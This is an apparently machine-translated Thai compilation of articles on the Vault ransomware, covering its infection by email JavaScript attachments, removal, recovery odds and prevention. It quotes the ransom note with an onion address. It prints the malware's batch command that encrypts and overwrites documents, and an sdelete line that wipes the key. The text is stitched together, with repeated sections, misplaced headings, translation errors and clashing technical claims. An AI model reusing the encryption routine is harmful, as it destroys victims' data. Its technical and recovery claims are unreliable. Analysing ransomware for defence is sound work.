ไวรัส Vault วิธีการกู้คืนไฟล์ windows xp วิธีการกู้คืนไฟล์ด้วยตัวคุณเองหลังจากไวรัส Vault Vault Virus - สิ่งที่ต้องทำ
ผู้เชี่ยวชาญด้านการป้องกันไวรัสของ Doctor Web ได้พัฒนาวิธีการถอดรหัสไฟล์ที่ไม่สามารถเข้าถึงได้อันเป็นผลมาจากการกระทำของตัวเข้ารหัสโทรจันที่เป็นอันตราย Trojan.Encoder.2843ผู้ใช้รู้จักในชื่อ "ห้องนิรภัย"
แรนซัมแวร์รุ่นนี้ตั้งชื่อตามประเภท Dr.Web Trojan.Encoder.2843, แพร่กระจายอย่างแข็งขันโดยอาชญากรไซเบอร์โดยใช้รายชื่อส่งเมลจำนวนมาก ไฟล์ขนาดเล็กที่มีสคริปต์ใน JavaScript ถูกใช้เป็นไฟล์แนบไปกับตัวอักษร ไฟล์นี้ดึงมาจากตัวมันเองโดยแอปพลิเคชันซึ่งดำเนินการส่วนที่เหลือที่จำเป็นเพื่อให้แน่ใจว่าการทำงานของตัวเข้ารหัส โทรจันแรนซัมแวร์รุ่นนี้เผยแพร่ตั้งแต่วันที่ 2 พฤศจิกายน 2558
แล้วนี้ละ มัลแวร์ยังค่อนข้างอยากรู้อยากเห็น เข้าสู่ระบบ รีจิสทรีของ windowsไลบรารีไดนามิกที่เข้ารหัส ( .DLL) ถูกเขียนขึ้น และโทรจันจะแทรกโค้ดขนาดเล็กลงในกระบวนการ explorer.exe ที่ทำงานอยู่ ซึ่งจะอ่านไฟล์จากรีจิสตรี้ในหน่วยความจำ ถอดรหัส และโอนการควบคุมไปยังไฟล์นั้น
รายการไฟล์ที่เข้ารหัส Trojan.Encoder.2843ยังเก็บใน การลงทะเบียนระบบและสำหรับแต่ละคนใช้คีย์ที่ไม่ซ้ำกันซึ่งประกอบด้วยอักษรละตินตัวพิมพ์ใหญ่ ไฟล์ได้รับการเข้ารหัสโดยใช้อัลกอริธึม Blowfish-ECB คีย์เซสชันถูกเข้ารหัสโดยใช้ RSA โดยใช้อินเทอร์เฟซ CryptoAPI นามสกุล .vault ถูกกำหนดให้กับไฟล์ที่เข้ารหัสแต่ละไฟล์
ผู้เชี่ยวชาญ Doctor Web ได้พัฒนาเทคนิคพิเศษที่อนุญาตให้ถอดรหัสไฟล์ที่เสียหายจากโทรจันนี้ได้ในหลายกรณี หากคุณตกเป็นเหยื่อของมัลแวร์ Trojan.Encoder.2843ให้ใช้แนวทางต่อไปนี้:
- ติดต่อตำรวจด้วยคำสั่งที่เกี่ยวข้อง
- พยายามติดตั้งใหม่ไม่ว่าในกรณีใดๆ ระบบปฏิบัติการ, "เพิ่มประสิทธิภาพ" หรือ "ล้างข้อมูล" โดยใช้ยูทิลิตี้ใดๆ
- อย่าลบไฟล์ใด ๆ ในคอมพิวเตอร์ของคุณ
- อย่าพยายามกู้คืนไฟล์ที่เข้ารหัสด้วยตัวเอง
- ติดต่อฝ่ายสนับสนุนด้านเทคนิคของ Doctor Web (บริการนี้ฟรีสำหรับผู้ใช้ใบอนุญาต Dr.Web เชิงพาณิชย์);
- แนบไฟล์ใดๆ ที่เข้ารหัสโดยโทรจันเข้ากับตั๋ว
- รอการตอบกลับจากผู้เชี่ยวชาญฝ่ายสนับสนุนด้านเทคนิค เนื่องจากมีคำขอจำนวนมาก จึงอาจใช้เวลาสักครู่
เราขอเตือนคุณว่าบริการถอดรหัสไฟล์มีให้เฉพาะผู้ถือใบอนุญาตเชิงพาณิชย์สำหรับผลิตภัณฑ์ป้องกันไวรัสของ Dr.Web เท่านั้น Doctor Web ไม่รับประกันว่าไฟล์ทั้งหมดที่เสียหายจากตัวเข้ารหัสจะถูกถอดรหัส แต่ผู้เชี่ยวชาญของเราจะพยายามอย่างเต็มที่เพื่อบันทึกข้อมูลที่เข้ารหัส
บทความของเราทุ่มเทให้กับ "ผลงานชิ้นเอก" ของแฮกเกอร์ - ไวรัส Vault ransomware เราจะบอกคุณว่าไวรัส Vault คืออะไรและมีผลกับระบบอย่างไร พิจารณาตัวเลือกที่คุณสามารถกู้คืนไฟล์ได้
Vault Virus - จะทำอย่างไร !
วันหนึ่ง "สวยงาม" คุณเปิดเดสก์ท็อปและเห็นโน้ตบุ๊กที่ทำงานอยู่พร้อมข้อความต่อไปนี้:
จากนี้จะชัดเจน - คุณกลายเป็น "เจ้าของที่โชคร้าย" ของไวรัส Vault ไวรัสนี้ติดคอมพิวเตอร์ของคุณและเริ่มเข้ารหัสไฟล์ของคุณ นี่คือวิธีที่ไฟล์ที่มีนามสกุล .pdf, .doc, .docx, .xls, .xlsx, .jpeg, .zip ฯลฯ อยู่ภายใต้การเข้ารหัส หลังจากไวรัสทำงาน นามสกุล .vault จะถูกเพิ่มลงในชื่อไฟล์ นอกจากนี้ ไวรัสในบางกรณีอาจส่งผลต่อฐานข้อมูล 1C ในเครื่อง อย่างที่คุณเห็น ห้องนิรภัยจะเข้ารหัสเอกสารทั้งหมดที่เป็นที่นิยมสำหรับการทำงาน
คุณอาจสงสัยว่า: ห้องนิรภัยมาที่คอมพิวเตอร์ของฉันได้อย่างไร ทุกอย่างง่ายเหมือนปอกเปลือกลูกแพร์ที่นี่ ผู้โจมตีส่งถึงคุณ อีเมลจดหมาย. ชื่อจดหมายพูดถึงความสำคัญและความจำเป็นเร่งด่วนในการเปิดอ่าน อาจเป็นจดหมายจากธนาคาร หุ้นส่วน หรือข้อเสนอที่ให้ผลกำไร ในจดหมายฉบับนี้มีเอกสารแนบที่มีนามสกุล .js (จาวาสคริปต์)
เมื่อเปิดตัว (และคุณเปิดใช้แล้ว!) ส่วนขยายไวรัสนี้จะดาวน์โหลดโปรแกรมเข้ารหัสจากเซิร์ฟเวอร์ของแฮ็กเกอร์ ในกรณีของคุณ ไวรัส Vault ransomware เป็นซอฟต์แวร์เข้ารหัสที่ถูกต้องตามกฎหมาย GPG (GnuPG)โดยใช้อัลกอริธึมการเข้ารหัส rsa-1024 ที่เป็นที่นิยม โปรแกรมไม่ใช่ไวรัส ดังนั้นโปรแกรมป้องกันไวรัสจะไม่บล็อกและอนุญาตให้ทำงาน GPG สร้างคีย์การเข้ารหัสสาธารณะ (บนพีซีของคุณ) และส่วนตัว (บนเซิร์ฟเวอร์ของผู้โจมตี)
มีการดัดแปลงหลายอย่างของไวรัส Vault ตัวอย่างเช่น สำหรับระบบ Windows 7/8, 32 บิต หรือ 64 บิต และเมื่อเข้าไปในแต่ละไวรัส ไวรัสก็ทำหน้าที่ในแบบของมันเอง นอกจากนี้ ไวรัสยังสามารถเข้ารหัสคอมพิวเตอร์ในเครือข่ายเดียวกันกับของคุณได้
จะลบไวรัส Vault ออกจากคอมพิวเตอร์ได้อย่างไร?
ไวรัสทำหน้าที่ในลักษณะที่ว่าในโฟลเดอร์ที่มีไฟล์ต้นฉบับ ไฟล์ที่คล้ายกับนามสกุล .pg จะถูกสร้างขึ้น จากนั้นไฟล์นี้จะเริ่มทำงาน แทนที่ไฟล์ต้นฉบับและเพิ่มส่วนขยายของห้องนิรภัย โดยการเปลี่ยนชื่ออย่างง่ายเอกสารไม่ได้กำจัดที่นี่ ดังนั้น มาดูวิธีการกู้คืนไฟล์และลบไวรัส vault กัน
กำจัดไวรัสเอง
ทันทีที่คุณพบส่วนขยาย vault ในเอกสารของคุณ ให้ปิดเครือข่ายทันที และหยุดทำงานกับแอปพลิเคชันทั้งหมด อย่าเปิดโฟลเดอร์บนดิสก์อีก เข้าสู่ระบบด้วย โหมดปลอดภัย.
ในแง่ของการกำจัดไวรัส Vault นั้นไม่ยาก การลบออกนั้นไม่ยาก สำหรับสิ่งนี้ ให้ใช้โปรแกรมยอดนิยมเพื่อลบไวรัส scrambler โฆษณาแบนเนอร์ โทรจัน แต่ปัญหาจะดำเนินต่อไป :(
สิ่งที่คุณต้องรู้คือตัวไวรัสเองนั้นถูกซ่อนอยู่ในโฟลเดอร์ Temp ไวรัสประกอบด้วยไฟล์ต่อไปนี้:
- 3c21b8d9.cmd;
- fabac41c.js;
- VAULT.txt;
- Sdc0.bat;
- VAULT.KEY;
- CONFIRMATION.คีย์
ไฟล์ทั้งหมดเหล่านี้ ยกเว้นสองไฟล์สุดท้าย (!) จะต้องถูกลบทิ้งถัดไป เรียกใช้ตัวล้าง ล้างการเริ่มต้น ตรวจสอบข้อผิดพลาดของรีจิสทรี (หลักการจะเหมือนกันสำหรับ Windows 7/8/10) ต้องทิ้งไฟล์ 2 ไฟล์สุดท้ายไว้ในคอมพิวเตอร์เนื่องจาก:
- VAULT.KEY - คีย์เข้ารหัสเอง ห้ามลบเด็ดขาด! มันถูกส่งไปยังผู้โจมตี วิเคราะห์ พวกเขาจะให้ส่วนที่สองของคีย์ในการถอดรหัสลับ
- CONFIRMATION.KEY - ไฟล์ด้วย ข้อมูลครบถ้วนเกี่ยวกับจำนวนไฟล์ที่เข้ารหัสบนพีซี ก็ยังจำเป็นสำหรับแฮกเกอร์
กู้คืนไฟล์ที่มีนามสกุล .vault ฟรี
ดังนั้นเราจึงมาถึงสิ่งที่เลวร้ายที่สุด - ไฟล์ยังคงเข้ารหัส ไม่มี decryptors ฟรีสำหรับไวรัส vault ไฟล์ที่มีคีย์ rsa-1024 สามารถถอดรหัสได้โดยโปรแกรมดั้งเดิมเท่านั้น
วิธีการกู้คืนไฟล์มีอะไรบ้าง:
หากคุณไม่พบสิ่งใดในถังรีไซเคิลและไม่มีจุดคืนค่าระบบ คุณจะต้องจ่ายให้กับอาชญากรไซเบอร์ ไม่มีอะไรที่คุณสามารถทำได้เกี่ยวกับเรื่องนี้ การวิเคราะห์บทสนทนาในฟอรัม ข้อสรุปดังต่อไปนี้ - ผู้โจมตีสามารถถอดรหัสไฟล์ได้จริง แต่คุณต้องจ่ายสำหรับสิ่งนี้หากสิ่งนี้ไม่เป็นความจริง คำพูดจากปากต่อปากบนอินเทอร์เน็ตคงแพร่กระจายไปนานแล้ว และผู้คนจะไม่ถูกชักจูงให้ทำเช่นนี้ ควรเข้าใจว่านี่เป็น "ระบบธุรกิจ" ทั้งหมด - คุณถูกจับได้ ตอนนี้คุณจ่ายเงินและทุกอย่างจะเรียบร้อย
มันถึงจุดที่มี super-agent บนอินเทอร์เน็ตอยู่แล้ว! นั่นคือคนกลางที่จะติดต่อผู้โจมตีให้คุณและแก้ปัญหาทั้งหมดของคุณ อยู่ที่ว่าจะทำหรือไม่ทำ ถ้าไม่อยากทำเองก็จ่ายเพิ่ม
ทำตามคำแนะนำจากไฟล์ข้อความ คุณจะเปิดเบราว์เซอร์ Tor (สำหรับการลบ IP โดยเฉพาะ) จากนั้นคุณจะถูกนำไปที่ไซต์ของอาชญากรไซเบอร์ มีคู่มือการทำงานกับเว็บไซต์และแม้แต่ระบบส่วนลด :(
แล้วแอนติไวรัสล่ะ?
น่าเสียดาย ตามที่กล่าวไว้ข้างต้น โปรแกรมแอนตี้ไวรัส Dr Web, Kaspersky, Avast และอื่นๆ ไม่สามารถทำอะไรได้ ท้ายที่สุดแล้วโปรแกรมไม่ใช่ไวรัส คำขออย่างเป็นทางการสำหรับการสนับสนุนทางเทคนิคของ Kaspersky Lab จบลงด้วยเรื่องราวโดยละเอียดเกี่ยวกับห้องนิรภัยและคำแนะนำในการใช้ตัวถอดรหัส RannohDecryptor, ScatterDecryptor, Rector Decryptor, RakhniDecryptor หรือ Xorist Decryptor โดยทั่วไป Doctor Web แนะนำให้ติดต่อตำรวจเกี่ยวกับการเข้าถึงคอมพิวเตอร์โดยไม่ได้รับอนุญาต อืม ขอบคุณหมอ
อย่างที่คุณเห็น มีตัวเลือกไม่มากนัก และหากไฟล์มีความสำคัญต่อคุณมาก คุณจะต้องจ่ายเงิน นอกจากนี้ยังเป็นไปไม่ได้ที่จะดึงสิ่งนี้ เซิร์ฟเวอร์ที่มีฐานข้อมูลและไซต์กำลังเคลื่อนที่อยู่ตลอดเวลา - เซิร์ฟเวอร์เก่าจะถูกลบออกและปรากฏขึ้นใหม่
และนี่คือวิดีโอสั้น ๆ ที่คุณสามารถดูว่าไวรัส Vault ทำงานอย่างไรในระบบ วิดีโอนี้ไม่ใช่โฆษณา :)
- เป็นไปได้มากที่คุณจะประสบปัญหาเช่นการเข้ารหัสไฟล์ของคุณและความปรารถนาโดยที่คุณไม่รู้ตัว โดยการเปิดลิงก์ในจดหมายที่ส่งถึงคุณทางไปรษณีย์และน่าจะมาจากผู้ส่งที่ยืนยันตัวตนซึ่งคุณได้ติดต่อไปแล้ว แต่อาจจะเป็นโฆษณาก็ได้! แต่ความจริงอยู่บนใบหน้าของคุณและคุณมีอาการดังต่อไปนี้ซึ่งแสดงออกดังนี้:
- เอกสารการทำงานและฐานข้อมูลของคุณถูกล็อคและทำเครื่องหมายด้วยรูปแบบ .vаult
- หากต้องการกู้คืน คุณจะต้องรับรหัสเฉพาะ
- ขั้นตอนการรับกุญแจ:
- สั้นๆ
- 1. ไปที่ทรัพยากรบนเว็บของเรา
- 2. รับคีย์ของคุณรับประกัน
- 3. กู้คืนไฟล์เป็นฟอร์มก่อนหน้า
- รายละเอียด
- ขั้นตอนที่ 1:
- ดาวน์โหลดเบราว์เซอร์ Tor จากเว็บไซต์ทางการ: https://www.torproject.org
- ขั้นตอนที่ 2:
- ใช้เบราว์เซอร์ Tor เยี่ยมชมเว็บไซต์: https://restoredz4xpmuqr.onion
- ขั้นตอนที่ 3:
- ค้นหา VAULT.KEY ที่ไม่เหมือนใครบนคอมพิวเตอร์ของคุณ นี่คือกุญแจสู่แผงไคลเอนต์ส่วนบุคคลของคุณ อย่าลบนะ
- ลงชื่อเข้าใช้ไซต์โดยใช้ VAULT.KEY
- ไปที่ส่วนคำถามที่พบบ่อยและอ่านขั้นตอนเพิ่มเติม
- ขั้นตอนที่ 4:
- หลังจากได้รับคีย์แล้ว คุณสามารถกู้คืนไฟล์ได้โดยใช้ซอฟต์แวร์โอเพ่นซอร์สของเรา รหัสแหล่งที่มาหรือการใช้ซอฟต์แวร์ของคุณปลอดภัย
- นอกจากนี้
- ก) คุณจะไม่สามารถกู้คืนไฟล์ได้หากไม่มีคีย์เฉพาะ (ซึ่งเก็บไว้อย่างปลอดภัยบนเซิร์ฟเวอร์ของเรา)
- b) หากคุณไม่พบ VAULT.KEY ของคุณ ให้ดูในโฟลเดอร์ชั่วคราว TEMP
- c) ค่าใช้จ่ายในการฟื้นฟูของคุณยังไม่สิ้นสุด เขียนไปที่แชท
- ล็อควันที่: 04/08/2015 (11:14)
- ขึ้นอยู่กับดุลยพินิจของคุณ คุณสามารถทำตามที่บอกในไฟล์ได้ (แต่ฉันจะไม่ทำ) ทำไม? เนื่องจากมันไม่น่าเชื่อถือ การจ่ายเงินให้พวกกรรโชกคือการรักษาและพัฒนาความแข็งแกร่งของพวกเขา จากนั้น vryatli คุณจะได้รับคีย์ถอดรหัส
- การปรากฏตัวของข้อความดังกล่าวหมายความว่าไวรัสห้องนิรภัยได้ติดคอมพิวเตอร์ของคุณและเริ่มเข้ารหัสไฟล์ ณ จุดนี้ คุณต้องปิดเครื่องคอมพิวเตอร์ทันที ยกเลิกการเชื่อมต่อจากเครือข่ายและลบทั้งหมด สื่อที่ถอดออกได้... เราจะพูดถึงวิธีการรักษาไวรัสในภายหลัง แต่ตอนนี้ ฉันจะบอกคุณว่าเกิดอะไรขึ้นในระบบของคุณ
- เป็นไปได้มากว่าคุณได้รับจดหมายทางไปรษณีย์จากคู่สัญญาที่เชื่อถือได้หรือปลอมตัวเป็น องค์กรที่มีชื่อเสียง... นี่อาจเป็นคำขอเพื่อดำเนินการกระทบยอดทางบัญชีในช่วงเวลาหนึ่ง คำขอเพื่อยืนยันการชำระเงินของใบแจ้งหนี้ภายใต้ข้อตกลง ข้อเสนอเพื่อทำความคุ้นเคยกับหนี้เงินกู้ที่ Sberbank หรืออย่างอื่น แต่ข้อมูลจะเป็นเช่นว่าคุณจะสนใจอย่างแน่นอนและคุณจะเปิดไฟล์แนบอีเมลที่มีไวรัส นี่คือสิ่งที่นับ
- ดังนั้น คุณเปิดไฟล์แนบที่มีนามสกุล .js และเป็นจาวาสคริปต์ ตามทฤษฎีแล้ว สิ่งนี้ควรเตือนคุณและห้ามไม่ให้คุณเปิดอ่าน แต่ถ้าคุณกำลังอ่านบรรทัดเหล่านี้ แสดงว่าไม่ได้เตือนคุณและไม่ได้หยุดคุณ สคริปต์ดาวน์โหลดโทรจันหรือห้องนิรภัยแบนเนอร์จากเซิร์ฟเวอร์ของผู้โจมตีตามที่สามารถเรียกได้ในกรณีนี้และโปรแกรมเข้ารหัส ใส่ทั้งหมดลงในไดเร็กทอรีชั่วคราวของผู้ใช้ และกระบวนการเข้ารหัสไฟล์จะเริ่มขึ้นทันทีในทุกที่ที่ผู้ใช้สามารถเข้าถึงได้ - ไดรฟ์เครือข่าย, แฟลชไดรฟ์, ฮาร์ดไดรฟ์ภายนอก ฯลฯ
- vault ransomware เป็นยูทิลิตี้เข้ารหัส gpg ฟรีและอัลกอริธึมการเข้ารหัสยอดนิยม - RSA-1024 โดยพื้นฐานแล้วยูทิลิตี้นี้ถูกใช้เป็นจำนวนมากโดยที่มันไม่ใช่ไวรัสในตัวเอง แอนตี้ไวรัสปล่อยให้มันผ่านไปและไม่ปิดกั้นการทำงานของมัน เปิดและ กุญแจส่วนตัวเพื่อเข้ารหัสไฟล์ คีย์ส่วนตัวยังคงอยู่บนเซิร์ฟเวอร์ของแฮ็กเกอร์และเป็นสาธารณะในคอมพิวเตอร์ของผู้ใช้
- จะใช้เวลาสักครู่หลังจากเริ่มกระบวนการเข้ารหัส ขึ้นอยู่กับปัจจัยหลายประการ - ความเร็วในการเข้าถึงไฟล์ ประสิทธิภาพของคอมพิวเตอร์ จากนั้นข้อความแสดงข้อมูลจะปรากฏขึ้นใน ไฟล์ข้อความ, เนื้อหาที่ฉันให้ในตอนต้น ณ จุดนี้ ข้อมูลบางส่วนได้รับการเข้ารหัสแล้ว
- โดยเฉพาะอย่างยิ่ง ฉันพบการดัดแปลงของไวรัส vault ที่ทำงานบนระบบ 32 บิตเท่านั้น นอกจากนี้ ใน Windows 7 ที่เปิดใช้งาน UAC การแจ้งเตือนให้ป้อนรหัสผ่านผู้ดูแลระบบจะปรากฏขึ้น ไวรัสไม่สามารถทำอะไรได้โดยไม่ใส่รหัสผ่าน ใน Windows XP จะเริ่มทำงานทันทีหลังจากเปิดไฟล์จากเมล โดยไม่ถามคำถามใดๆ
- ไวรัสทำอะไรกับไฟล์กันแน่? เมื่อมองแวบแรก ดูเหมือนว่าเพิ่งเปลี่ยนส่วนขยายจากมาตรฐานเป็น .vault เมื่อครั้งแรกที่ฉันเห็นการทำงานของไวรัสแรนซัมแวร์นี้ ฉันคิดว่ามันเป็นสัญญาณรบกวนของเด็ก ฉันเปลี่ยนชื่อไฟล์กลับและรู้สึกประหลาดใจมากเมื่อมันไม่เปิดตามที่คาดไว้ และแทนที่จะเป็นเนื้อหาที่ตั้งใจไว้ อักขระที่เข้าใจยากกลับเปิดขึ้น จากนั้นฉันก็รู้ว่าทุกอย่างไม่ง่าย ฉันเริ่มเข้าใจและค้นหาข้อมูล
- ไวรัสสแกนไฟล์ยอดนิยมทุกประเภท - doc, docx, xls, xlsx, jpeg, pdf และอื่น ๆ เพิ่มนามสกุล .vault ใหม่ในชื่อไฟล์มาตรฐานแล้ว สำหรับบางคน มันยังเข้ารหัสไฟล์ด้วยฐานข้อมูล 1C ในเครื่อง ฉันไม่มีสิ่งนี้ดังนั้นฉันจึงไม่ได้สังเกตสิ่งนี้เป็นการส่วนตัว เพียงแค่เปลี่ยนชื่อไฟล์กลับตามที่คุณเข้าใจ ไม่ได้ช่วยอะไรที่นี่
- เนื่องจากกระบวนการเข้ารหัสไม่ได้เกิดขึ้นในทันที จึงอาจเกิดขึ้นได้ว่าเมื่อคุณพบว่าคุณมีไวรัสในคอมพิวเตอร์ ไฟล์บางไฟล์จะยังคงเป็นปกติ และบางไฟล์อาจติดไวรัส เป็นการดีถ้าส่วนใหญ่ยังไม่ถูกแตะต้อง แต่บ่อยครั้งที่ไม่มีใครวางใจได้
- ฉันจะบอกคุณถึงสิ่งที่ซ่อนอยู่เบื้องหลังการเปลี่ยนแปลงส่วนขยาย หลังจากเข้ารหัส เช่น file.doc ข้างๆ ไวรัส vault จะสร้างไฟล์ที่เข้ารหัส file.doc.gpg จากนั้น file.doc.gpg ที่เข้ารหัสจะถูกย้ายไปยังตำแหน่งเดิมด้วยชื่อใหม่ file.doc และ หลังจากนั้นจะเปลี่ยนชื่อเป็นไฟล์ doc.vault ปรากฎว่าไฟล์ต้นฉบับไม่ได้ถูกลบ แต่ถูกเขียนทับโดยเอกสารที่เข้ารหัส หลังจากนั้นจะไม่สามารถกู้คืนได้โดยใช้เครื่องมือการกู้คืนมาตรฐาน ไฟล์ที่ถูกลบ... นี่คือโค้ดบางส่วนที่ใช้ฟังก์ชันนี้:
- หลังจากตรวจพบไวรัสแรนซัมแวร์แล้ว ขั้นตอนแรกคือ กำจัดไวรัสโดยรักษาคอมพิวเตอร์ของคุณ เป็นการดีที่สุดที่จะบูตจากบางส่วน ดิสก์สำหรับบูตและทำความสะอาดระบบด้วยตนเอง Virus vault ในแง่ของการกัดกร่อนต่อระบบ ไม่ใช่เรื่องยาก ง่ายต่อการทำความสะอาดด้วยตัวเอง ฉันจะไม่พูดถึงประเด็นนี้โดยละเอียด เนื่องจากคำแนะนำมาตรฐานสำหรับการลบไวรัส ransomware แบนเนอร์และโทรจันมีความเหมาะสมที่นี่
- ตัวไวรัสเองนั้นอยู่ในโฟลเดอร์ temp ของผู้ใช้ที่เปิดใช้งาน ไวรัสประกอบด้วยไฟล์ต่อไปนี้ ชื่ออาจมีการเปลี่ยนแปลง แต่โครงสร้างจะเหมือนกัน:
ทันใดนั้น ไฟล์ข้อความเปิดขึ้นในแผ่นจดบันทึกโดยมีเนื้อหาดังต่อไปนี้:
ไวรัสทำให้ส่วนขยาย vault ใน doc, jpg, xls และไฟล์อื่น ๆ
dir / B "% 1:" && สำหรับ / r "% 1:" %% i ใน (* .xls * .doc) ทำ (echo "%% TeMp %% \ svchost.exe" -r Cellar --yes - q --no-verbose --trust-model เสมอ --encrypt-files "%% i" ^ & ย้าย / y "%% i.gpg" "%% i" ^ & เปลี่ยนชื่อ "%% i" "%% ~ nxi.vault ">>"% temp% \ cryptlist.lst "echo %% i >>"% temp% \ conf.list ")
วิธีลบไวรัส vault และรักษาคอมพิวเตอร์ของคุณ
- 3c21b8d9.cmd
- 04fba9ba_VAULT.KEY
- CONFIRMATION.KEY
- fabac41c.js
- Sdc0.bat
- VAULT.KEY
- VAULT.txt
วิธีการกู้คืนและถอดรหัสไฟล์หลังจาก vault virus
"% temp% \ sdelete.exe" / accepteula -p 4 -q "% temp% \ secring.gpg"
Kaspersky, drweb และแอนตี้ไวรัสอื่นๆ ในการต่อสู้กับ vault ransomware
วิธีการป้องกันไวรัสในห้องนิรภัย
VAULT ransomware ปรากฏตัวครั้งแรกในรัสเซียในเดือนกุมภาพันธ์ 2015 และได้รับชื่อเสียง หนึ่งในอันตรายที่สุดและไวรัสที่รักษาไม่หาย ในเดือนพฤศจิกายน การติดเชื้อระลอกที่สองเริ่มต้นขึ้น ซึ่งมีลักษณะที่ใหญ่โตกว่า คลื่นลูกที่สามเกิดขึ้นในกลางเดือนมกราคม 2559 และมีจำนวนอุปกรณ์ที่ติดไวรัสมากกว่ารุ่นก่อนๆ
ไวรัส VAULT ransomware คืออะไร?
ไวรัส VAULT เป็นรูปแบบหนึ่งของโทรจันเข้ารหัส
การเจาะเข้าไปในคอมพิวเตอร์โดยใช้การกระทำของผู้ใช้ โปรแกรมจะเข้ารหัสข้อมูลบางประเภทด้วยอัลกอริธึมนับสิบที่มีรูปแบบเฉพาะ
ข้อมูลเดิมจะไม่ถูกลบ แต่แทนที่ด้วยความเสียหาย ซึ่งทำให้การกู้คืนข้อมูลแทบจะเป็นไปไม่ได้เลย
คีย์ซึ่งทำให้สามารถถอดรหัสข้อมูลได้จะถูกลบออกจากระบบโดยอัตโนมัติเมื่อสิ้นสุดการเข้ารหัส
เป้าหมายของผู้โจมตีคือการรีดไถเงินเพื่อแลกกับการถอดรหัสข้อมูล ในกรณีนี้ ความน่าจะเป็นของการถอดรหัสไฟล์ไม่เกิน 50%
ตัวอย่างของคอมพิวเตอร์ที่ติดไวรัส VAULT: คำขอเอกสารหลักจากคู่สัญญามาถึงอีเมลที่ใช้งานได้ หรือการแจ้งเตือนเกี่ยวกับความจำเป็นในการติดตั้งแพ็คเกจการอัพเดทจาก ConsultantPlus ไฟล์ที่มีข้อมูลอธิบายแนบมากับจดหมาย ทันทีที่เปิดไฟล์ปฏิบัติการและไฟล์เสริม กระบวนการเข้ารหัสข้อมูลจะเริ่มต้นขึ้น
VAULT เข้ารหัสไฟล์ใดบ้าง
ผู้โจมตีมีความสนใจในข้อมูลเชิงพาณิชย์ เช่นเดียวกับสื่อรูปภาพ เสียง และวิดีโอ ดังนั้น ไฟล์ที่มีนามสกุลต่อไปนี้จึงถูกโจมตี: .rar, .zip, .jpg, .psd, .doc, .xls, .ppt, .pdf, .mp3, .ogg, .avi, .mpeg, .html, .txt, ฐานข้อมูล 1C เป็นต้น
เมื่อคอมพิวเตอร์ติดไวรัส a เอกสารข้อความกับผู้ติดต่อของผู้หลอกลวง ค่าใช้จ่ายในการถอดรหัสข้อมูลแตกต่างกันไปตั้งแต่ $ 10 ถึง $ 50,000 ค่าใช้จ่ายประมาณการโดยผู้หลอกลวงหลังจากที่ผู้ใช้ได้รับการติดต่อ จำนวนเงินค่าไถ่ขึ้นอยู่กับจำนวนของข้อมูลที่เข้ารหัส ในเวลาเดียวกัน ไม่มีการรับประกันว่าข้อมูลจะถูกกู้คืนอย่างน้อยบางส่วน
จะป้องกันคอมพิวเตอร์ของคุณจากตัวเข้ารหัส VAULT ได้อย่างไร
ในกรณีส่วนใหญ่ การติดไวรัสเกิดขึ้นเมื่อไม่มีโปรแกรมป้องกันไวรัสในคอมพิวเตอร์ หรือเมื่อ รุ่นฟรีบน. ที่น่าเชื่อถือน้อยที่สุดในความเห็นของเราคือ Avast Antivirus
อย่างไรก็ตาม เจ้าของแพ็คเกจซอฟต์แวร์ป้องกันไวรัสที่ได้รับอนุญาต ซึ่งรวมถึงเวอร์ชันองค์กร มักจะตกเป็นเหยื่อ
ผู้เชี่ยวชาญด้านความปลอดภัยไอทีจาก ESET และ Dr.Web ได้พัฒนา ชุดคำแนะนำสากลที่ช่วยปกป้องคอมพิวเตอร์หรือแล็ปท็อปของคุณจากไวรัส VAULT และโทรจันแรนซัมแวร์ที่คล้ายกัน:
ติดตั้งการอัปเดตระบบปฏิบัติการที่สำคัญอย่างทันท่วงที
เลือกซอฟต์แวร์ป้องกันไวรัสที่มีไฟร์วอลล์ในตัว
ปิดการใช้งานการส่งและรับ ไฟล์ปฏิบัติการ(.exe) บนเมลเซิร์ฟเวอร์
ป้องกันการทำงานของมาโครใน Microsoft Officeหรือซอฟต์แวร์ที่คล้ายกัน
ออกกำลังกายสม่ำเสมอ สำรองข้อมูล
คัดลอกข้อมูลสำคัญไปยังสื่อภายนอก
วิธีการลบ VAULT ออกจากคอมพิวเตอร์?
บน ช่วงเวลานี้การติดไวรัส VAULT และการเข้ารหัสข้อมูลเป็นครั้งเดียวและไม่ได้ทำให้เกิดการติดไวรัสของไฟล์ระบบ ดังนั้นการสแกนด้วยยูทิลิตี้ Dr.Web CureIt ก็เพียงพอที่จะลบไวรัสออกจากระบบ อย่างไรก็ตาม คุณควรจำไว้ว่าการพยายามรักษาหรือลบไฟล์ที่ติดไวรัส รวมทั้งการติดตั้ง Windows ใหม่ จะทำให้ความสามารถในการกู้คืนข้อมูลที่เข้ารหัสเป็นโมฆะ
กล่าวคือ การลบไวรัสไม่ใช่เรื่องยาก หากคุณพร้อมที่จะมีส่วนร่วมกับข้อมูลที่เข้ารหัสไว้ตลอดไป หรือคุณมี ข้อมูลสำรองบนสื่อภายนอก
วิธีการกู้คืนไฟล์ VAULT?
ทันทีที่คุณ พบเชื้อ เราเห็นการเปลี่ยนแปลงไอคอนไฟล์และนามสกุลประเภทใหม่ เช่น .doc.vault, ปิดคอมพิวเตอร์หรือแล็ปท็อปของคุณทันที ยิ่งรันนาน ไฟล์ก็ยิ่งสูญเสียมากขึ้น
มาทำซ้ำกันเถอะ: การสแกนดิสก์ด้วยโปรแกรมป้องกันไวรัส ล้างไฟล์ ติดตั้งระบบใหม่ และเครื่องมือมาตรฐานอื่นๆ จะลดโอกาสในการถอดรหัสข้อมูลเท่านั้น
ไม่มีนักพัฒนาซอฟต์แวร์ป้องกันไวรัสยังไม่สามารถสร้างยูทิลิตี้เพื่อถอดรหัสข้อมูลที่เปิดเผยต่อ VAULT ได้
จุดคืนค่าระบบถูกทำลายโดยไวรัส มีโอกาสกู้คืน Windows จาก shadow copy โดยใช้ยูทิลิตี้ Shadow Editor เมื่อทำงานกับ Windows Vista / 7/8/10 แต่ในกรณีส่วนใหญ่ Shadow Copy ก็หายไปเช่นกัน
หากคุณมีผลิตภัณฑ์ลิขสิทธิ์ NOD32 หรือ Dr.Web คุณสามารถติดต่อ การสนับสนุนทางเทคนิคด้วยการขอถอดรหัสข้อมูล
นอกจากนี้ผู้เชี่ยวชาญแนะนำให้ติดต่อกับตำรวจด้วยคำแถลงเนื่องจากการกระทำของผู้โจมตีแสดงสัญญาณของอาชญากรรมภายใต้ศิลปะ ศิลปะ. 159.6, 163, 165, 272, 273 แห่งประมวลกฎหมายอาญาของสหพันธรัฐรัสเซีย
